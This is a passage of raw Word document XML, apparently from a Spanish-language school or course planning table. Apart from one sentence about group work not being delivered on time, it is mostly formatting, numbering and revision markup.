          <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="008E4695" w:rsidP="00977D14">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00C452D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Por alguna circunstancia no se pueda entregar en tiempo y forma la actividad, entre ellas falla de </w:t>
            </w:r>
            <w:r w:rsidRPr="00C452D1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>conexión a internet, algún integrante no termine la actividad que se le asigno en tiempo y forma.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="425" w:firstLine="284"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14"/>
    <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14"/>
    <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14"/>
    <w:p w:rsidR="00977D14" w:rsidRPr="00977D14" w:rsidRDefault="00977D14" w:rsidP="00977D14"/>
    <w:p w:rsidR="00B31DA8" w:rsidRPr="009B1F20" w:rsidRDefault="00B31DA8" w:rsidP="001358CD"/>
    <w:sectPr w:rsidR="00B31DA8" w:rsidRPr="009B1F20" w:rsidSect="00A5030D">
      <w:pgSz w:w="15840" w:h="12240" w:orient="landscape"/>
      <w:pgMar w:top="1701" w:right="1417" w:bottom="1701"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03F6" w:rsidRDefault="00D703F6" w:rsidP="00C02100">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D703F6" w:rsidRDefault="00D703F6" w:rsidP="00C0210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itstream Charter">
    <w:altName w:val="Times New Roman"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="DejaVu Sans">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74BD" w:rsidRDefault="00DE74BD">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>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74BD" w:rsidRDefault="00DE74BD">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>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74BD" w:rsidRDefault="00DE74BD">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>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74BD" w:rsidRDefault="00DE74B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03F6" w:rsidRDefault="00D703F6" w:rsidP="00C02100">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00D703F6" w:rsidRDefault="00D703F6" w:rsidP="00C0210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74BD" w:rsidRDefault="00DE74BD">
    <w:pPr>
      <w:pStyle w:val="Encabezad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74BD" w:rsidRDefault="00DE74BD" w:rsidP="00B31DA8">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4419"/>
        <w:tab w:val="clear" w:pos="8838"/>
        <w:tab w:val="left" w:pos="2940"/>
      </w:tabs>
    </w:pP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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">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74BD" w:rsidRDefault="00DE74BD">
    <w:pPr>
      <w:pStyle w:val="Encabezad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74BD" w:rsidRDefault="00DE74BD">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>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74BD" w:rsidRDefault="00DE74BD">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42048"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DA2E5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8A84864"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF5044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8B838EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A54CE33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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0BD058CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C5856C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D412EA4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D605D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F167666"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="680050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0025D36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BA2DA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2A32141"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CAC804B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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="152C6D07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0D664E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54E058C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A9E68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5EE06D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6FC88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7BD5989"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C2285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18BD51F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A10FA40"/>
    <w:lvl w:ilvl="0" w:tplc="080A000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="19812324"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A33A8B10"/>
    <w:lvl w:ilvl="0" w:tplc="080A000D">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1429" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1AB71292"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7646C480"/>
    <w:lvl w:ilvl="0" w:tplc="DCDC8804">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Estilo1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="197AE0AC">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1C855F23"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CFC437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1CF06A0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1B47E2A"/>
    <w:lvl w:ilvl="0" w:tplc="3BC2FCBA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Vietapirmernivel"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="080A0003">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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="20312F9B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04FC8B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21933DF1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C96ED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245C1F1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F40FA7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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="24673692"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5FE8D2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249511DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9822F2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26652CBE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDAC4A52"/>
    <w:lvl w:ilvl="0" w:tplc="81E6F6C6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:color w:val="000000" w:themeColor="text1"/>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2DD27CEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E1480C08"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>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EBA5B63"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D3630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315962D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FB06AD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366466E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08784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8E67F53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B5A06B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3FE73A8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D944A87A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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4A4C15A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B872A6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4F27556A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34C4CC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542A1BF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A726F7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5BBC015A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F006D5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5BE702C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66C2B27E"/>
    <w:lvl w:ilvl="0" w:tplc="F9D27198">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>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609F00D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BAAC09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66E34EB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B14EBC2"/>
    <w:lvl w:ilvl="0" w:tplc="3A8673DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="Vietadesegundonivel"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6EA870AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F51614B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37" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6F572223"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB06A6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729229BE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04F0D9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790623C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA9E58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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C7F6CD7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="832A46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4"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="36"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="7"/>
    <w:lvlOverride w:ilvl="0"/>
    <w:lvlOverride w:ilvl="1"/>
    <w:lvlOverride w:ilvl="2"/>
    <w:lvlOverride w:ilvl="3"/>
    <w:lvlOverride w:ilvl="4"/>
    <w:lvlOverride w:ilvl="5"/>
    <w:lvlOverride w:ilvl="6"/>
    <w:lvlOverride w:ilvl="7"/>
    <w:lvlOverride w:ilvl="8"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="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4A6C"/>
    <w:rsid w:val="000011A4"/>
    <w:rsid w:val="00005067"/>
    <w:rsid w:val="00006D88"/>
    <w:rsid w:val="00012875"/>
    <w:rsid w:val="000216BD"/>
    <w:rsid w:val="00024C67"/>
    <w:rsid w:val="0003135A"/>
    <w:rsid w:val="00031AF6"/>
    <w:rsid w:val="000324C9"/>
    <w:rsid w:val="00035B09"/>
    <w:rsid w:val="00035BB2"/>
    <w:rsid w:val="00037CF9"/>
    <w:rsid w:val="000408C0"/>
    <w:rsid w:val="00041E5C"/>
    <w:rsid w:val="00041FF8"/>
    <w:rsid w:val="00045590"/>
    <w:rsid w:val="000466D3"/>
    <w:rsid w:val="00050EE4"/>
    <w:rsid w:val="0005116B"/>
    <w:rsid w:val="00051CF8"/>
    <w:rsid w:val="00052CE9"/>
    <w:rsid w:val="00054F32"/>
    <w:rsid w:val="00057F20"/>
    <w:rsid w:val="000612DD"/>
    <w:rsid w:val="00061FDF"/>
    <w:rsid w:val="00064150"/>
    <w:rsid w:val="0006563F"/>
    <w:rsid w:val="00066586"/>
    <w:rsid w:val="00075389"/>
    <w:rsid w:val="00081D6F"/>
    <w:rsid w:val="00083119"/>
    <w:rsid w:val="00094E8E"/>
    <w:rsid w:val="000A01B4"/>
    <w:rsid w:val="000A48BE"/>
    <w:rsid w:val="000C05FC"/>
    <w:rsid w:val="000D0A37"/>
    <w:rsid w:val="000D0A41"/>
    <w:rsid w:val="000D19B4"/>
    <w:rsid w:val="000D3F60"/>
    <w:rsid w:val="000D3F96"/>
    <w:rsid w:val="000E362E"/>
    <w:rsid w:val="000E5951"/>
    <w:rsid w:val="000E6F6B"/>
    <w:rsid w:val="000E780E"/>
    <w:rsid w:val="000F3A6B"/>
    <w:rsid w:val="000F4895"/>
    <w:rsid w:val="000F62D5"/>
    <w:rsid w:val="00101019"/>
    <w:rsid w:val="00110002"/>
    <w:rsid w:val="001154FC"/>
    <w:rsid w:val="00117B87"/>
    <w:rsid w:val="00120B21"/>
    <w:rsid w:val="00122DE3"/>
    <w:rsid w:val="001242C3"/>
    <w:rsid w:val="00130872"/>
    <w:rsid w:val="00130DC2"/>
    <w:rsid w:val="00130FBD"/>
    <w:rsid w:val="0013283C"/>
    <w:rsid w:val="001358CD"/>
    <w:rsid w:val="00136363"/>
    <w:rsid w:val="00143519"/>
    <w:rsid w:val="00144B7F"/>
    <w:rsid w:val="00151001"/>
    <w:rsid w:val="001635A0"/>
    <w:rsid w:val="00167841"/>
    <w:rsid w:val="00167D61"/>
    <w:rsid w:val="00171363"/>
    <w:rsid w:val="00171B63"/>
    <w:rsid w:val="00171B65"/>
    <w:rsid w:val="00173BA8"/>
    <w:rsid w:val="001740E6"/>
    <w:rsid w:val="001829E2"/>
    <w:rsid w:val="001857A3"/>
    <w:rsid w:val="00186B15"/>
    <w:rsid w:val="0018733F"/>
    <w:rsid w:val="00197AE0"/>
    <w:rsid w:val="001A2ECB"/>
    <w:rsid w:val="001A4435"/>
    <w:rsid w:val="001A4B71"/>
    <w:rsid w:val="001A4C29"/>
    <w:rsid w:val="001B33FD"/>
    <w:rsid w:val="001B35A0"/>
    <w:rsid w:val="001B6286"/>
    <w:rsid w:val="001B679F"/>
    <w:rsid w:val="001C2FF9"/>
    <w:rsid w:val="001C352E"/>
    <w:rsid w:val="001C4F86"/>
    <w:rsid w:val="001C7BA5"/>
    <w:rsid w:val="001D059F"/>
    <w:rsid w:val="001D466B"/>
    <w:rsid w:val="001D657E"/>
    <w:rsid w:val="001D728F"/>
    <w:rsid w:val="001D75A1"/>
    <w:rsid w:val="001E0264"/>
    <w:rsid w:val="001E31A2"/>
    <w:rsid w:val="001E7629"/>
    <w:rsid w:val="001F316B"/>
    <w:rsid w:val="001F3333"/>
    <w:rsid w:val="001F48CF"/>
    <w:rsid w:val="001F6CA9"/>
    <w:rsid w:val="00205514"/>
    <w:rsid w:val="00205A91"/>
    <w:rsid w:val="00206A9C"/>
    <w:rsid w:val="002102B2"/>
    <w:rsid w:val="002221FC"/>
    <w:rsid w:val="002230A4"/>
    <w:rsid w:val="00226ED2"/>
    <w:rsid w:val="002336FB"/>
    <w:rsid w:val="00236265"/>
    <w:rsid w:val="00241B69"/>
    <w:rsid w:val="0024250F"/>
    <w:rsid w:val="00244FB1"/>
    <w:rsid w:val="00247ED3"/>
    <w:rsid w:val="00252FA9"/>
    <w:rsid w:val="0025575A"/>
    <w:rsid w:val="002570A2"/>
    <w:rsid w:val="00265093"/>
    <w:rsid w:val="00265DD2"/>
    <w:rsid w:val="0026746A"/>
    <w:rsid w:val="0027476C"/>
    <w:rsid w:val="00280046"/>
    <w:rsid w:val="0028090C"/>
    <w:rsid w:val="00285836"/>
    <w:rsid w:val="0028614E"/>
    <w:rsid w:val="00290004"/>
    <w:rsid w:val="002928C3"/>
    <w:rsid w:val="00295256"/>
    <w:rsid w:val="00296F9B"/>
    <w:rsid w:val="002973C3"/>
    <w:rsid w:val="002A02F1"/>
    <w:rsid w:val="002A2C05"/>
    <w:rsid w:val="002B21E7"/>
    <w:rsid w:val="002B7C69"/>
    <w:rsid w:val="002C4A56"/>
    <w:rsid w:val="002C4C69"/>
    <w:rsid w:val="002C760A"/>
    <w:rsid w:val="002D371F"/>
    <w:rsid w:val="002D696B"/>
    <w:rsid w:val="002D6D25"/>
    <w:rsid w:val="002E1A7E"/>
    <w:rsid w:val="002E1DEF"/>
    <w:rsid w:val="002E3253"/>
    <w:rsid w:val="002F2E0B"/>
    <w:rsid w:val="002F6818"/>
    <w:rsid w:val="002F77A4"/>
    <w:rsid w:val="00300C1B"/>
    <w:rsid w:val="00302666"/>
    <w:rsid w:val="00310E0A"/>
    <w:rsid w:val="0031100E"/>
    <w:rsid w:val="00312D0D"/>
    <w:rsid w:val="00314F25"/>
    <w:rsid w:val="0031563E"/>
    <w:rsid w:val="00317B5C"/>
    <w:rsid w:val="003227B6"/>
    <w:rsid w:val="00324C70"/>
    <w:rsid w:val="00325E60"/>
    <w:rsid w:val="00340280"/>
    <w:rsid w:val="00343B71"/>
    <w:rsid w:val="0035068D"/>
    <w:rsid w:val="0035373E"/>
    <w:rsid w:val="00360271"/>
    <w:rsid w:val="0036169D"/>
    <w:rsid w:val="00363F3D"/>
    <w:rsid w:val="00365DBA"/>
    <w:rsid w:val="003738EB"/>
    <w:rsid w:val="00376E2B"/>
    <w:rsid w:val="00377499"/>
    <w:rsid w:val="003830AC"/>
    <w:rsid w:val="003872FC"/>
    <w:rsid w:val="0039047F"/>
    <w:rsid w:val="003926BC"/>
    <w:rsid w:val="00392AEA"/>
    <w:rsid w:val="003974E2"/>
    <w:rsid w:val="003A2989"/>
    <w:rsid w:val="003A595B"/>
    <w:rsid w:val="003A5CB0"/>
    <w:rsid w:val="003A68DF"/>
    <w:rsid w:val="003A6A77"/>
    <w:rsid w:val="003A7AEC"/>
    <w:rsid w:val="003C423D"/>
    <w:rsid w:val="003C4A6C"/>
    <w:rsid w:val="003C59A1"/>
    <w:rsid w:val="003D2E45"/>
    <w:rsid w:val="003E03B5"/>
    <w:rsid w:val="003E1407"/>
    <w:rsid w:val="003E2474"/>
    <w:rsid w:val="003E4D63"/>
    <w:rsid w:val="003E5C0C"/>
    <w:rsid w:val="003E7AED"/>
    <w:rsid w:val="003F0EBC"/>
    <w:rsid w:val="003F1152"/>
    <w:rsid w:val="004052DE"/>
    <w:rsid w:val="00406EEF"/>
    <w:rsid w:val="00411995"/>
    <w:rsid w:val="00413DF2"/>
    <w:rsid w:val="0041510A"/>
    <w:rsid w:val="0041575E"/>
    <w:rsid w:val="00415769"/>
    <w:rsid w:val="0041791B"/>
    <w:rsid w:val="0042181B"/>
    <w:rsid w:val="00430274"/>
    <w:rsid w:val="00435FCB"/>
    <w:rsid w:val="00441431"/>
    <w:rsid w:val="0044264F"/>
    <w:rsid w:val="004438DE"/>
    <w:rsid w:val="00443F33"/>
    <w:rsid w:val="00445DC2"/>
    <w:rsid w:val="00447D47"/>
    <w:rsid w:val="00454BA6"/>
    <w:rsid w:val="004633DE"/>
    <w:rsid w:val="00464E1E"/>
    <w:rsid w:val="00471260"/>
    <w:rsid w:val="004769BD"/>
    <w:rsid w:val="004818BC"/>
    <w:rsid w:val="00485634"/>
    <w:rsid w:val="00485772"/>
    <w:rsid w:val="00497965"/>
    <w:rsid w:val="004A07B7"/>
    <w:rsid w:val="004B09FB"/>
    <w:rsid w:val="004B44BF"/>
    <w:rsid w:val="004B73A6"/>
    <w:rsid w:val="004C09BA"/>
    <w:rsid w:val="004C1CB9"/>
    <w:rsid w:val="004C1F57"/>
    <w:rsid w:val="004C5F5A"/>
    <w:rsid w:val="004D0E4D"/>
    <w:rsid w:val="004D1C2D"/>
    <w:rsid w:val="004D649B"/>
    <w:rsid w:val="004E13BA"/>
    <w:rsid w:val="004E67F9"/>
    <w:rsid w:val="004E7F78"/>
    <w:rsid w:val="004F1823"/>
    <w:rsid w:val="004F2568"/>
    <w:rsid w:val="004F71AF"/>
    <w:rsid w:val="004F7BF9"/>
    <w:rsid w:val="0050420F"/>
    <w:rsid w:val="00511565"/>
    <w:rsid w:val="005128F1"/>
    <w:rsid w:val="00521C41"/>
    <w:rsid w:val="005302EB"/>
    <w:rsid w:val="005435A3"/>
    <w:rsid w:val="00543DD9"/>
    <w:rsid w:val="005450B9"/>
    <w:rsid w:val="005467EF"/>
    <w:rsid w:val="005643F2"/>
    <w:rsid w:val="00565415"/>
    <w:rsid w:val="005702EF"/>
    <w:rsid w:val="00574B2B"/>
    <w:rsid w:val="00581DB3"/>
    <w:rsid w:val="00584233"/>
    <w:rsid w:val="00584878"/>
    <w:rsid w:val="00586BB7"/>
    <w:rsid w:val="005933E6"/>
    <w:rsid w:val="00593527"/>
    <w:rsid w:val="0059624A"/>
    <w:rsid w:val="005A13A3"/>
    <w:rsid w:val="005B4B4E"/>
    <w:rsid w:val="005B7380"/>
    <w:rsid w:val="005C10C0"/>
    <w:rsid w:val="005C10CB"/>
    <w:rsid w:val="005C2329"/>
    <w:rsid w:val="005D0053"/>
    <w:rsid w:val="005D21E0"/>
    <w:rsid w:val="005D280C"/>
    <w:rsid w:val="005E008C"/>
    <w:rsid w:val="005E32CE"/>
    <w:rsid w:val="005E62A6"/>
    <w:rsid w:val="005E669E"/>
    <w:rsid w:val="005E6F84"/>
    <w:rsid w:val="005F373E"/>
    <w:rsid w:val="005F7EF1"/>
    <w:rsid w:val="006033C8"/>
    <w:rsid w:val="00603FBC"/>
    <w:rsid w:val="0061072B"/>
    <w:rsid w:val="00611C19"/>
    <w:rsid w:val="00613992"/>
    <w:rsid w:val="00613D1A"/>
    <w:rsid w:val="00620E76"/>
    <w:rsid w:val="00622A8E"/>
    <w:rsid w:val="00623075"/>
    <w:rsid w:val="00630B13"/>
    <w:rsid w:val="006318DF"/>
    <w:rsid w:val="00635BBB"/>
    <w:rsid w:val="006428F6"/>
    <w:rsid w:val="00642B87"/>
    <w:rsid w:val="00646906"/>
    <w:rsid w:val="00653DA4"/>
    <w:rsid w:val="006561C1"/>
    <w:rsid w:val="00661467"/>
    <w:rsid w:val="00666849"/>
    <w:rsid w:val="006673BD"/>
    <w:rsid w:val="00670813"/>
    <w:rsid w:val="006725F3"/>
    <w:rsid w:val="00674C17"/>
    <w:rsid w:val="006759C3"/>
    <w:rsid w:val="00677667"/>
    <w:rsid w:val="0068295B"/>
    <w:rsid w:val="00690663"/>
    <w:rsid w:val="00691016"/>
    <w:rsid w:val="00691FDE"/>
    <w:rsid w:val="0069251A"/>
    <w:rsid w:val="0069750A"/>
    <w:rsid w:val="006A045E"/>
    <w:rsid w:val="006A2B9C"/>
    <w:rsid w:val="006A5836"/>
    <w:rsid w:val="006A655A"/>
    <w:rsid w:val="006A727E"/>
    <w:rsid w:val="006B2FC1"/>
    <w:rsid w:val="006B43F6"/>
    <w:rsid w:val="006B6753"/>
    <w:rsid w:val="006B7D3B"/>
    <w:rsid w:val="006C7D6F"/>
    <w:rsid w:val="006D17E5"/>
    <w:rsid w:val="006D3A9A"/>
    <w:rsid w:val="006E093D"/>
    <w:rsid w:val="006E3969"/>
    <w:rsid w:val="006E4A5E"/>
    <w:rsid w:val="006E6F6D"/>
    <w:rsid w:val="006F3D5A"/>
    <w:rsid w:val="006F4AA8"/>
    <w:rsid w:val="006F4F45"/>
    <w:rsid w:val="00700C23"/>
